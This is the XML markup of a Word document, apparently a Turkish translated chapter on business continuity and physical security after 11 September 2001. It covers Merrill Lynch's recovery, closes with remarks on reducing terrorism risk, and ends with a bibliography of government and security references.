        <w:t>Haftanın sonunda, BCP ekibinin önceliği, tüm çalışanlarla iletişim kurabildiklerinden emin olmak için değişti. İşçilerin şirketin krizi ele aldığından ve yerinden edilmiş işçilere alan tahsis edildiğinden emin olmaları gerekiyordu. Daha fazla bilgi için nereye başvuracaklarını ve hangi insan kaynakları hattını arayabileceklerini bildiren mesajlar gönderil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Merrill Lynch’in başkanı, CEO’su ve üst düzey iş ve teknoloji yöneticileri önceden kaydedilmiş mesajlar yaptı</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Özel bir acil durum iletişim sistemi kullanılarak olaydan etkilenen tüm çalışanlara otomatik olarak gönderildi. Bu, felaketten sonraki ilk hafta boyunca yaklaşık 74.000 telefon görüşmesine neden oldu. Bal, “Bu çok önemli bir parçasıydı” diyor. “Çalışan tabanımıza doğru bilgi edinmek, basında çok fazla yanlış bilgi olması nedeniyle işi zorlaştırdı. Ayrıca, önemli iş milleti, tüm önemli müşterilerimizi aramak ve Merrill Lynch'in işletmeye açıldığına dair doğru bilgilerle güvence vermek için büyük çaba sarf etti.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Kilit bir lojistik zorluk, yerinden edilmiş binlerce işçiyi yeni çalışma yerlerine götürmesiydi. Şirket, şehirdeki çeşitli noktalardan diğer noktalara bir dizi feribot ve otobüs işletti. Şirket İnternet sitesi, taşıma bilgilerini etkilenen çalışanlara iletmek için de kullanılmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="_Toc7996904"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">20. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dersler öğrenildi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>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al ve ekibi, önümüzdeki aylarda planlarının belirli yönlerini, bu kadar yıkıcı bir olaydan kurtarma başarısındaki başarılarından sonra bile, “Gelecekte çok daha fazla konsantre olacağımızı düşündüğüm şeylerden biri bölge- geniş felaketler. Örneğin, çok fazla değil, 'Binanız yıkıldı ve içeri giremezsiniz', ama belki 'İçinde bulunduğunuz şehir önemli şekillerde etkilenir.' Yani, nasıl olduğumuzu görmeye çalışacağız. bir binanın değil, bir binanın etkilendiği yerler açısından firmayı daha sağlam kılabilir ”de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al ayrıca birçok şirketin gayrimenkul stratejilerini yeniden değerlendireceğine inanıyor. “Bütün operasyonlarını gerçekten tek bir binada yapmak istiyor musun?” Diye soruyor. “Neyse ki, Merrill Lynch gibi bir şirket için kullanabileceğimiz çok sayıda gayrimenkul seçeneğimiz var.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="_Toc7996905"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">20.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Önümüzdeki Çalışma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>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CP ekibi, ikinci haftanın sonuna kadar yedekleme tesisleri için yedekleme planları üzerinde çalışmakla meşguldü, birincil bölgeler de temizlendi veya satın alındı. “Operasyonlarımızın çoğu yedekleme modunda” diyor Bal, “Yedekleme planları için yedekleme planları denemek ve geliştirmek için çok çalıştık. Bu büyük bir zorluktu. ”</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Şimdi takım, kendi zorluklarını ortaya koyan birincil sitelerin yeniden başlatılması için planlama aşamasındadır. Birincil tesislere geri dönülmesi yalnızca çalışanların hasarlı tesisleri yeniden yerine getirmesi tamamen güvenli olduğunda yapılmalıdır.</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al ve ekibi için en önemli şeylerden biri, saldırıyı takip eden Pazartesi sabahına kadar her şeyin normal operasyonların yaklaşık yüzde 95'ine döndüğü idi. Geçtiğimiz birkaç yıl boyunca bu büyüklükteki bir kesintiye hazırlık çabaları karşılığını verdi. Bal, “Kesinlikle benim bakış açımdan, şirketi Mayıs ayında yapılan eğitim alıştırmasıyla yaptığımız için çok mutlu oldum” diyor. “Yapmaları gerekenler konusunda çok sayıda kilit yöneticiyi aydınlattı, bu yüzden çok hazırlıklıydık. Çoğu insan biliyordu</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ne yapacağım, bu bana çok güven vericiydi. ”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="218" w:name="_Toc7996906"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">21. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sonuç</w:t>
      </w:r>
      <w:bookmarkEnd w:id="218"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FB4935" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>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k tehditlerine karşı kırılganlığın azaltılması 11 Eylül 2001'den sonra çok daha karmaşık hale gel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Terörizmin şimdi tüm fiziksel güvenlik planlamasına dahil edilmesi gerekiyor. 11 Eylül olayları, düşman niyetinde olanları caydırmak için tasarlanan prosedürlerin intihar teröristlerine karşı etkisiz olabileceğini gösterdi.</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Fiziksel güvenliğin şu anda işletme paradigmasını caydırıcılıktan değiştirerek terörizm riskini azaltma önlemine dönüştürmesi gerekiyor. Düşmanlık eylemlerini önlemek için onları caydırmak yerine ek önlemler almak çok daha zor ve maliyetlidir, ancak zorunludur. Örgütlenme, çalışma arkadaşları ve ailesini terörizmden korumak eğitim ile mümkündür. Teröristler tarafından kullanılabilecek hassas bilgilere erişimin kontrolünü sağlamak çok önemlidir. Birçok hükümet İnternet sitesi terörizmle mücadelede faydalı olabilecek bilgilerle doludur. Ne yazık ki, bu Web sitelerinin birçoğu bu bilgileri güvenlik açıklarını bulmak için bu bilgileri kullanabilecek potansiyel teröristlere de sağlayabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00692EDF" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İ</w:t>
      </w:r>
      <w:r w:rsidRPr="00692EDF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>thaf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu bölüm, 11 Eylül 2001 olaylarından hayatları kaybedilen veya etkilenenlere saygılı bir şekilde ithaf edilmiştir. Yazarın, bu bölümde sunulan bilgilerin bu tür başka bir olayın olasılığını azaltmada yardımcı olacağına dair en büyük umudu vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="219" w:name="_Toc7996907"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">22. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kaynakça</w:t>
      </w:r>
      <w:bookmarkEnd w:id="219"/>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIPC Danışmanlığı 02-001: İnternet İçeriği Danışmanlığı: İstenmeyen Kitleyi Göz önünde bulundurarak, Ulusal Altyapı Koruma Merkezi, 17 Ocak 2002.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hizmet Üyesinin Kişisel Koruma Kılavuzu: Terörle Mücadele için Bir Kendi Kendine Yardım El Kitabı, ABD Genelkurmay Başkanları, Birleşik Personel Rehberi 5260, Temmuz 1996.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Birleşik Terörizmle Mücadele için Taktikler, Teknikler ve Prosedürler, ABD Genelkurmay Başkanları, Joint Pub 3-07.2, 17 Mart 1998, Ek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ATF Bombası Tehdit Kontrol Listesi, ATF-F 1613.1, Alkol Bürosu, Tütün ve Ateşli Silahlar, Haziran 1997.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE118D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Merrill Lynch, Saldırı Tutanakları İçindeki Kritik İşletme İşlevlerine Devam Ediyor, Janette Ballman, Afet Kurtarma Dergisi, 14, 4, s. 26, Güz 2001.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D82ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">]  </w:t>
      </w:r>
      <w:r w:rsidRPr="008927EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authentication and key distribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in computer networks and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008927EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Rolf Oppliger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D82ECB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D82ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="008927EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Anonymous Two-Factor Authentication in Distributed Systems: Certain Goals Are Beyond Attainment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00FE118D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4">
      <w:bookmarkStart w:id="220" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="220"/>
    </w:p>
    <w:sectPr w:rsidR="00E77DF4" w:rsidSect="00AA12F1">
      <w:footerReference w:type="default" r:id="rId1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91" w:rsidRDefault="007C7991" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007C7991" w:rsidRDefault="007C7991" w:rsidP="00E7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rumpMediaeval-Bold">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Minio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Compresse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F1" w:rsidRDefault="007C7991">
    <w:pPr>
      <w:pStyle w:val="AltBilgi"/>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00AA12F1" w:rsidRDefault="007C79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F1" w:rsidRDefault="007C7991">
    <w:pPr>
      <w:pStyle w:val="AltBilgi"/>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidRDefault="007C79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91" w:rsidRDefault="007C7991" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="007C7991" w:rsidRDefault="007C7991" w:rsidP="00E7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32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4966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74925"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C19E555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754216"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FA78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102C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="530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34619"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5AAA4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C664A64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F1099D0"/>
    <w:lvl w:ilvl="0" w:tplc="C81EB566">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>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420B1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="413E7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F34CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5406BC5E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="440" w:hanging="4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563CC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EAE7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8C5C60"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D508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E55D7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25C18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A52ABADA"/>
    <w:lvl w:ilvl="0" w:tplc="B54490C4">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4ABC978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BA1C5492">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E7A2A0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58483F8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6D00F83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2CEE1ABA">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A6048BA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B143C1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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15E073BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2DA6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A32FA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6B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B4603A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1E29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177F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E971A1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04905FCA"/>
    <w:lvl w:ilvl="0" w:tplc="20FA5746">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7AAED8C0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B7744C02" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="35BE17AA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
